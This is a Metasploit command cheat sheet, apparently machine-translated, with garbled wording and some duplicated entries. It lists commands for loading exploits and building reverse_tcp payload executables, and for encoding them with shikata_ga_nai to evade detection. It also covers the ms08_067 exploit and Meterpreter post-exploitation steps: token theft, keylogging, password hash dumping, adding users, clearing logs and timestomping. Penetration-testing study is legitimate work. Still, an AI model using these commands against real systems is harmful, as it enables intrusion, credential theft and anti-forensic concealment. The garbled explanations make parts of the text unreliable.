Metasploit is an open source security vulnerability detection tool that helps security and IT professionals identify security issues, validate vulnerability mitigation measures, and manage expert-driven security assessments to provide true security risk intelligence. These features include smart development, password auditing, Web application scanning, and social engineering. Team work together in Metasploit and consolidated reports to present their findings.
The following is a description of its usage parameters
Show exploits
Lists all penetration attack modules in the Metasploit framework.
Show payloads
Lists all attack payloads in the Metasploit framework.
Show Auxiliary
Lists all the secondary attack payloads in the Metasploit framework.
Search Name
Find all the infiltration attacks and other modules in the Metasploit framework.
Show exploits
Lists all penetration attack modules in the Metasploit framework.
Show payloads
Lists all attack payloads in the Metasploit framework.
Show Auxiliary
Lists all the secondary attack payloads in the Metasploit framework.
Search Name
Find all the infiltration attacks and other modules in the Metasploit framework.
Info
Displays information about a specific penetration attack or module.
Use name
Load a penetration attack or module.
Lhost
You can have the IP address of the destination host connected locally, usually when the target host is not in the same LAN, it needs to be a public IP address, especially for the rebound shell use.
RHOST
Remote host or target host.
Set function
Set specific configuration parameters (EG: Set local or remote host parameters).
SETG function
Set specific configuration parameters globally (EG: Set local or remote host parameters).
Show options
Lists all the configuration parameters in a penetration attack or module.
Show targets
Lists all supported target platforms for penetration attacks.
Set Target num
Specify the operating system and patch version type of the target you know.
Set payload Name
Specifies the attack payload you want to use.
Show advanced
Lists all advanced configuration options.
Set Autorunscript migrate-f.
After the infiltration attack is complete, it is automatically migrated to another process.
Check
Detects if the target has a corresponding security vulnerability in the selected penetration attack.
Exploit
Perform a penetration attack or module to attack the target.
Exploit-j
A infiltration attack under a scheduled task (the attack will take place in the background).
Exploit-z
The infiltration attack does not interact with the reply after it is completed.
EXPLOIT-E Encoder
Develop the attack load coding method used (Eg:exploit-e Shikata_ga_nai).
Exploit-h
Lists the help information for the exploit command.
Sessions-l
Lists the available interactive sessions (used when working with multiple shells).
Sessions-l-V
Lists all available interactive sessions and details, EG: Which security vulnerability was used to attack the system.
Sessions-s Script
Run a specific Metasploit script in all active Metasploit sessions.
Sessions-k
Kills all active interactive sessions.
Sessions-c cmd
Executes a command on all active Metasploit sessions.
Sessions-u SessionID
Upgrade a normal Win32 Shell to the Metasploit shell.
Db_create Name
Create a database (Eg:db_create autopwn) to be used by a database-driven attack.
Db_connect Name
Create and connect a database (Eg:db_connect user:[email protected]/sqlname) to be used by a database-driven attack.
Db_namp
Use Nmap and store the scanned data in the database (support common NMAP statements, eg:-st-v-p0).
Db_autopwn-h
Displays the help information for the DB_AUTOPWN command.
Db_autopwn-p-R-E
Perform db_autopwn on all discovered open ports, attack all systems, and use a bounce shell.
Db_destroy
Deletes the current database.
Db_destroy User:[email Protected]:port/database
Use the advanced option to delete the database.
Metasploit Command * * *
Help
Open Meterpreter use Help.
Run ScriptName
Run the Meterpreter script, and in the Scripts/meterpreter directory, you can view all the script names.
SysInfo
Lists system information for the managed host.
Ls
Lists the file and folder information for the destination host.
Use Priv
Load the elevation of Privilege extension module to extend the Metasploit library.
Ps
Displays all running processes and associated user accounts.
Migrate PID
Migrates to a specified process ID (PID number can be obtained from the host via the PS command).
Use Incognito
Load Incognito function (used to steal the target host's token or impersonate the user)
List_tokens-u
Lists the available tokens for the target host user.
List_tokens-g
Lists the available tokens for the target host user group.
Impersonate_token Domain_name\\username
Impersonate a token that is available on the target host.
Steal_token PID
Steals the available tokens for a given process and makes a token impersonation.
Drop_token
Stop impersonating the current token.
Getsystem
Use various attack vectors to elevate system user privileges.
Execute-f Cmd.exe-i
Executes the Cmd.exe command and interacts.
Execute-f Cmd.exe-i-T
Executes the cmd command with all available tokens and hides the process.
Rev2self
Back to the initial user account that controls the target host.
Reg command
Interact, create, delete, query, and so on in the target host registry.
Setdesktop number
Switch to another user interface (the feature is based on those users who are logged on).
Screenshot
To the screen of the target host.
Upload file
Uploads a file to the target host.
Download file
Download the file from the target host.
Keyscan_start
Turn on keylogger for remote target host.
Keyscan_dump
Stores the keylogger captured on the target host.
Keyscan_stop
Stops the keylogger for the target host.
Getprivs
Get the privileges on the target host as much as possible.
Uictl Enable Keyboard/mouse
Take over the target host's keyboard and mouse.
Background
Turn your current Metasploit shell into a background execution.
Hashdump
Export the password hash value in the destination host.
Use sniffer
Load sniffer mode.
Sniffer_interfaces
Lists all open network ports for the target host.
Sniffer_dump InterfaceID Pcapname
Start sniffing on the target host.
Sniffer_start InterfaceID Packet-buffer
Initiates a sniffer on the target host for a specific range of packet buffers.
Sniffer_stats InterfaceID
Gets the statistics that are implementing the sniffer network interface.
Sniffer_stop InterfaceID
Stop sniffing.
Add_user username password-h IP
Add a user on the remote destination host.
Clearev
Clear the log records on the target host.
Timestomp
Modify file properties, such as modifying the creation time of a file (anti-forensics investigation).
Reboot
Restart the target host.
Msfpayload Command * * *
Help information for the
Msfpayload-h
Msfpayload.
Msfpayload windows/meterpreter/bind_tcp O
Lists the configuration entries for the attack payload available under all WINDOWS/METERPRETER/BIND_TCP (any attack payload is available).
Msfpayload windows/meterpreter/reverse_tcp lhost=ip lport=port X > Payload.exe
to create a Metasploit reverse_ TCP attack payload, which is connected back to Lhostip's Lport, is saved as a Windows executable program named Payload.exe.
Msfpayload windows/meterpreter/reverse_tcp lhost=ip lport=port R > Payload.raw
to create a Metasploit reverse_ The TCP attack payload, back to the Lhostip Lport, is saved to the Msffencode named Payload.raw, which is used in the back of the file.
Msfpayload windows/meterpreter/reverse_tcp lport=port C > PAYLOAD.C
Create a Metasploit reverse_tcp attack payload, Export shellcode in c format.
Msfpayload windows/meterpreter/reverse_tcp lport=port J > Payload.java
Create a Metasploit reverse_tcp attack payload, Exported as a JavaScript language string in%u encoding.
Msfencode Command * * *
Mefencode-h
Lists the help commands for Msfencode.
Msfencode-l
Lists all the available encoders.
Msfencode-t (C,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
Displays the format of the encoded buffer.
Msfencode-i payload.raw-o encoded_payload.exe-e x86/shikata_ga_nai-c 5-t exe
Use the Shikata_ga_nai encoder to encode the Payload.raw file 5, and then export a file named Encoded_payload.exe.
Msfpayload windows/meterpreter/bind_tcp Lport=port R | MSFENCODE-E x86/_countdown-c 5-t Raw | Msfencode-e x86/shikata_ga_nai-c 5-t Exe-o Multi-encoded_payload.exe
Creates an attack payload that is nested encoded in multiple encoded formats.
Msfencode-i Payload.raw bufferregister=esi-e x86/alpja_mixed-t C
Create a pure alphanumeric shellcode that is only shellcode by the ESI register and output in the C language format.
MSFCLI Command * * *
MSFCLI | grep exploit
Only the penetration attack module is listed.
MSFCLI | grep exploit/windows
Lists only the penetration attack modules associated with Windows.
MSFCLI exploit/windows/smb/ms08_067_netapi payload=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
The IP initiates a MS08_067_NETAPI penetration attack, configures the BIND_TCP attack payload, and binds to the port ports for monitoring.
Metasploit Command Daquan